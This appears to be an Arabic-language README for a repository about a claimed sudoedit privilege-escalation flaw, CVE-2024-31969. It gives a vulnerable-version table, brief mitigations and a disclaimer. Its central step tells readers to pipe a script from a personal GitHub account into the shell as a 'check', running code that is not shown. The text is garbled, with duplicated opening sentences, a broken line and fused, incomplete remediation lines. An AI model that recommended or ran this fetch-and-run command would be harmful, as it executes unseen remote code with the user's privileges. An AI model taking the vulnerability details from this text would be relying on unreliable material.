
CVE-2024-31969 هو تصعيد امتيازات محلي في sudo عند استخدام sudoedit.
CVE-2024-31969 هو ثغرة رفع امتيازات محلية في sudo عند استخدام الأمر sudoedit.
هذه الثغرة تم تقديمها منذ sudo 1.9.0 بسبب طريقة تحقق sudoedit من متغيرات البيئة للمستخدم وملكية الملفات بشكل غير صحيح.
عيب تم تقديمه في sudo 1.9.0 في كيفية تحقق
sudoeditمن متغيرات البيئة للمستخدمين وملكية الملفات.
هذه الثغرة تسمح لمستخدم محلي لديه صلاحية الوصول إلى sudoedit بتعديل ملفات عشوائية كجذر من خلال التلاعب بمتغيرات البيئة مثل SUDO_EDITOR، أو عن طريق استغلال الروابط الرمزية.
| إصدار Sudo | الحالة |
|---|---|
| 1.9.0 → 1.9.15p4 | 🔥 ضعيف |
| 1.9.15p5 فما فوق | ✅ آمن |
| 1.8.x (بما في ذلك 1.8.23) | ❌ غير متأثر |
قم بتشغيل الأمر التالي:
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh
sudo إلى الإصدار 1.9.15p5 أو أحدث.sudoers التي تسمح بـ sudoedit للمستخدمين غير الجذر.env_keep أو env_reset الآمن في ملف /etc/sudoers.تم إنشاء هذا المستودع لأغراض تعليمية و توثيق أمن النظام.
يُحظر بشدة استخدام هذه المعلومات لأنشطة غير قانونية أو بدون إذن كتابي من مالك النظام.
أي شكل من أشكال سوء الاستخدام يقع بالكامل خارج مسؤولية المنشئ.